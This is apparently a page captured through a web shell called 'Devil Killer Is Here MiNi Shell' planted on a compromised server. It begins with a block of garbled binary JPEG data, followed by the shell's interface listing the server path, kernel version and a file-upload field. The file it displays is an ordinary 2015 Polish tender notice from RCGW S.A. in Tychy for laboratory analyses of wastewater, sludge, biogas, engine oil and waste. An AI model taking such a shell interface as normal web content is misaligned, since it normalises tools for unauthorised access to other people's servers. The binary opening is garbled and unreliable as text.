JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151216/345282-N-2015.html

<p class="kh_header"><b>Tychy: Wykonanie analiz laboratoryjnych prób ścieków, wód powierzchniowych, osadów ściekowych, wód podziemnych, odpadów, rudy darniowej, olejów oraz pomiar emisji do atmosfery zanieczyszczeń gazowych dla Oczyszczalni Tychy - Urbanowice</b><br>
<b>Numer ogłoszenia: 345282 - 2015; data zamieszczenia: 16.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspokajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie analiz laboratoryjnych prób ścieków, wód powierzchniowych, osadów ściekowych, wód podziemnych, odpadów, rudy darniowej, olejów oraz pomiar emisji do atmosfery zanieczyszczeń gazowych dla Oczyszczalni Tychy - Urbanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonywanie w laboratorium Wykonawcy analiz laboratoryjnych prób ścieków, wód powierzchniowych, osadów ściekowych, wód podziemnych, odpadów, rudy darniowej, olejów oraz pomiar emisji do atmosfery zanieczyszczeń gazowych dla oczyszczalni Tychy- Urbanowice.
Zakres przedmiotu zamówienia obejmuje 4 części zamówienia.
Wykonawca może złożyć ofertę częściową na jedną lub więcej części zamówienia.  
Oferta musi zawierać pełen zakres zamówienia na każdą część, której dotyczy. 
Oferty nie zawierające wszystkich pozycji zostaną odrzucone jako niezgodne z treścią siwz.  

2.Szczegółowy opis przedmiotu zamówienia:
Wykonanie analiz laboratoryjnych prób ścieków, wód powierzchniowych, osadów ściekowych, wód podziemnych, odpadów, rudy darniowej, olejów oraz pomiar emisji do atmosfery zanieczyszczeń gazowych dla oczyszczalni Tychy - Urbanowice.

Zakres przedmiotu zamówienia obejmuje:

CZĘŚĆ 1 - Wykonywanie analiz laboratoryjnych ścieków, osadu ściekowego, wód powierzchniowych i podziemnych oraz rudy darniowej dla Oczyszczalni Ścieków Tychy-Urbanowice.

1A) Analiza ścieków w zakresie:
a.Azot Kjeldahla - 100 analiz
b.BZT5 - 100 analiz.

2A) Analiza ścieków w zakresie:
a.Węglowodory ropopochodne - 100 analiz
b.Chrom ogólny- 100 analiz
c.Cynk - 100 analiz 
d.Nikiel - 100 analiz
e.Ołów - 100 analiz.

3A) Analiza wód powierzchniowych w zakresie:
a.Azot Kjeldahla - 8 analiz
b.BZT5 - 8 analiz
c.Węglowodory  ropopochodne - 8 analiz 
d.Chrom ogólny - 8 analiz
e.Cynk - 8 analiz
f.Nikiel - 8 analiz
g.Ołów - 8 analiz.

4A) Analiza ścieków w zakresie:
fenole lotne, chlorki, siarczany, rtęć, kadm, cynk, miedź, nikiel, chrom, ołów, arsen, wanad, srebro, heksachlorocykloheksan (HCH), tetrachlorometan (czterochlorek węgla - CCl4), pentachlorofenol (PCP), aldryna, dieldryna, endryna, izodryna, heksachlorobenzen (HCB), heksachlorobutadien (HCBD), trichlorometan (chloroform - CHCl3), 1,2-dichloroetan (EDC), trichloroetylen (TRI), tetrachloroetylen (nadchloroetylen - PER), trichlorobenzen (TCB) - 8 analiz.
	
5A) Analiza ścieków w zakresie:
a.ChZTCr - 100 analiz
b.BZT5 - 100 analiz
c.Zawiesina ogólna- 100 analiz
d.Azot ogólny (z rozbiciem na składowe: azot amonowy, azotynowy, azotanowy, Kjeldahla) - 100 analiz
e.Fosfor ogólny - 100 analiz.

6A) Analiza osadu ściekowego w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 06 lutego 2015r.  w sprawie komunalnych osadów ściekowych wraz z wydaniem opinii - 48 analiz.

7A) Analiza odwodnionego osadu ściekowego w zakresie: Escherichia Coli - 25 analiz.

8A) Analiza osadu ściekowego w zakresie: Enterokoki - 25 analiz.

9A) Analiza wód podziemnych w zakresie: odczyn, przewodność elektryczna właściwa PEW, ołów, kadm, miedź, cynk, chrom VI, rtęć, bor, sód, magnez, glin, potas, wapń, mangan, ogólny węgiel organiczny OWO, wodorowęglany, ortofosforany, chlorki, siarczany, amoniak, azotyny, azotany, indeks fenolowy, substancje powierzchniowo czynne- anionowe - 8 analiz.

10A) Analizy rudy darniowej: oznaczenie żelaza ogólnego, żelaza Fe2+, pH wyciągu wodnego, pozostałość nierozpuszczalna w HCl, wilgotność - 7  analiz.

CZĘŚĆ 2 - Wykonywanie analiz laboratoryjnych biogazu i spalin (pomiar emisji zanieczyszczeń) dla Oczyszczalni Ścieków Tychy-Urbanowice.

1B) Analiza biogazu:
a.Przed instalacją odsiarczania H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] - 24 analizy
b.Za instalacją odsiarczania: O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3] , wilgotność, wartość opałowa [MJ/Nm3] - 24 analizy
c.Za instalacją odsiarczania: badanie związków krzemu w zakresie: tetrametylosilan, trimetylosilanol, heksametylodisiloksan, heksametylocyklotrisiloksan, oktametylotrisiloksan, oktametylocyklotetrasiloksan, dekametylotetrasiloksan, dekametylocyklopentasiloksan - 16 analiz
d.Z modelu laboratoryjnego komór fermentacyjnych w zakresie: O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3] , wilgotność, wartość opałowa [MJ/Nm3], ciepło spalania [MJ/Nm3], próbki przechowywane w zbiornikach o objętości 80 dm3 - 112 analiz

2B) Analiza spalin (pomiar emisji zanieczyszczeń w zakresie wynikającym z Rozporządzenia Ministra Środowiska z dnia 30 października 2014r. Dz. U 2014 poz. 1542: CO, CO2, NOx, SO2, pyły - 16 analiz.

CZĘŚĆ 3 - Wykonywanie analiz laboratoryjnych oleju silnikowego dla Oczyszczalni Ścieków Tychy-Urbanowice.

1C) Badanie oleju silnikowego w zakresie: glin, miedź, chrom, żelazo, ołów, cyna, nikiel, bor, siarka, krzem, sód, potas, fosfor, molibden, magnez, wapń, cynk, lepkość 40 oC, lepkość 100 oC, liczba kwasowa, liczba zasadowa, IpH, glikol, nitracja, sulfatacja, wilgoć, oksydacja oraz wydanie opinii, czy dany olej nadaje się do dalszego stosowania w silnikach opalanych biogazem - 60 analiz.

CZĘŚĆ 4 - Wykonywanie analiz laboratoryjnych odpadów dla Oczyszczalni Ścieków Tychy-Urbanowice.

1D) Badanie odpadów w zakresie: wilgotność, popiół w 550 oC, ciepło spalania stan suchy, ciepło spalania stan roboczy, wartość opałowa stan roboczy, wartość opałowa stan suchy, węgiel całkowity, wodór, azot, siarka całkowita, chlor, fluor, brom - 50 analiz.

Wykonawca może złożyć ofertę częściową na jedną lub więcej części zamówienia.

Wymagania stawiane Wykonawcom zawarte są w pkt. III.4 siwz.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 u.p.z.p. - stanowiących nie więcej niż 50% wartości zamówienia podstawowego dla każdej części zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli:
-załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do  siwz (dla części 1- 4 zamówienia)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli:
- załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dla części 1- 4 zamówienia) oraz
- załączą do oferty wypełniony i podpisany wykaz wykonanych głównych usług (odpowiednio dla danej części zamówienia załącznik nr 5.1/ 5.2/ 5.3 do siwz), w którym:
-dla Części 1 zamówienia:
w zakresie określonym łącznie w pkt. III.3 ppkt.1A) - 9A) siwz - potwierdzi należyte wykonanie analiz laboratoryjnych, w kwocie co najmniej 20 000 zł brutto/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.    

-dla Części 2 zamówienia:
w zakresie określonym łącznie w pkt. III.3 ppkt. 1B) oraz 2B) siwz - potwierdzi należyte wykonanie analiz laboratoryjnych, w kwocie co najmniej 20 000 zł brutto/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.

-dla Części 3 zamówienia:
w zakresie określonym w pkt. III.3 ppkt. 1C) siwz - potwierdzi należyte wykonanie badań laboratoryjnych, w kwocie co najmniej 7 000 zł brutto/rok, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.

W celu potwierdzenia spełnienia w/w warunku Wykonawca zobowiązany jest złożyć wraz z ofertą wykaz wykonanych głównych usług, a w przypadku świadczeń okresowych lub ciągłych wykaz wykonywanych głównych usług sporządzony, zgodnie z załącznikiem nr 5.1/ 5.2/ 5.3 (odpowiednio dla danej części zamówienia) do SIWZ wraz z dowodami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie oraz wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz.

Dowody określające, że usługi (odpowiednio dla danej części zamówienia)  zostały wykonane należycie stanowią poświadczenia, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze, Wykonawca nie jest w stanie uzyskać poświadczenia, wówczas przedkłada własne oświadczenie. 

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, zgodnie z załącznikiem nr 5A do siwz.     

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, postawiony warunek musi spełniać co najmniej jeden z Wykonawców wspólnie składających ofertę (odpowiednio dla danej części zamówienia)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli:
-załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dla części 1 - 4 zamówienia)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli:
-załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dla części 1 - 4 zamówienia)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawcy ubiegający się o zamówienie publiczne spełnią ww. warunek, jeżeli:
-załączą do oferty wypełnione i podpisane oświadczenie wg wzoru załącznika nr 2 do siwz (dla części 1 - 4 zamówienia)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)Ważny Certyfikat Akredytacji Laboratorium Badawczego Wykonawcy, wraz z zakresem akredytacji na analizy, na które Wykonawca składa ofertę (co do których Zamawiający wymaga akredytacji - zgodnie z pkt III.5 siwz), wydany przez Polskie Centrum Akredytacji lub inne jednostki certyfikujące, będące sygnatariuszami wielostronnego porozumienia EA lub ILAC- dot. części 1, 2, 3 i 4 zamówienia. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.  
b)W przypadku, gdy Wykonawca zamierza  stosować w badaniach wymienionych w pkt. III. 3 ppkt.1A) - 5A) siwz (dot. części 1 zamówienia) własne procedury badawcze, Zamawiający wymaga, aby Wykonawca złożył oświadczenie (załącznik nr 7 do siwz), że procedury te są zgodne z metodami podanymi w Rozporządzenia Ministra Środowiska z dnia 18 listopada 2014r. w sprawie warunków jakie należy spełniać przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. 2014 poz. 1800)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz Oferty - sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej siwz. 
2)Zestawienie cenowe zaoferowanego przedmiotu zamówienia - załącznik nr 1A/1B/1C/1D do siwz (w zależności od części, na którą Wykonawca składa ofertę).
3)Upoważnienie dla osoby/osób do podpisania oferty oraz do występowania w imieniu Wykonawcy, jeżeli nie wynika to z innych dołączonych dokumentów - załącznik nr 4 do siwz.
4)Informacja Wykonawcy tj.: Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej- wzór stanowi załącznik nr 4A do SIWZ.
5)W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 u.p.z.p.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - TERMIN PŁATNOŚCI - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie ze wzorem Istotnych postanowień umowy, które stanowią załączniki nr 6A, 6B, 6C, 6D (osobno dla części 1 - 4 zamówienia)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A., Al. Marszałka J. Piłsudskiego 12, 43-100 Tychy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2016 godzina 10:00, miejsce: w siedzibie Regionalnego Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, w sekretariacie, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamawiający dopuszcza składanie ofert częściowych.
2.Zamawiający nie dopuszcza składania ofert wariantowych.
3.Wszystkie rozliczenia związane z realizacją zamówienia publicznego, którego dotyczy niniejsza SIWZ dokonywane będą w PLN.
4.Zamawiający przewiduje udzielenie zamówień uzupełniających.
5.Zamawiający nie przewiduje zawarcia umowy ramowej.
6.Zamawiający informuje, że nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej oraz ustanowienia dynamicznego systemu zakupów. 
7.Zamawiający w przedmiotowym postępowaniu nie prowadził dialogu technicznego.
8.Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części zamówienia podwykonawcom. W takim przypadku Wykonawca zobowiązany jest do wskazania w ofercie (załącznik nr 1) części zamówienia (zakresu), których wykonanie zamierza powierzyć podwykonawcom.
9.Postępowanie o udzielenie zamówienia jest prowadzone w języku polskim.
10.Zamawiający oświadcza, że przedmiot zamówienia nie będzie finansowany 
z udziałem środków z funduszu Unii Europejskiej..</p>
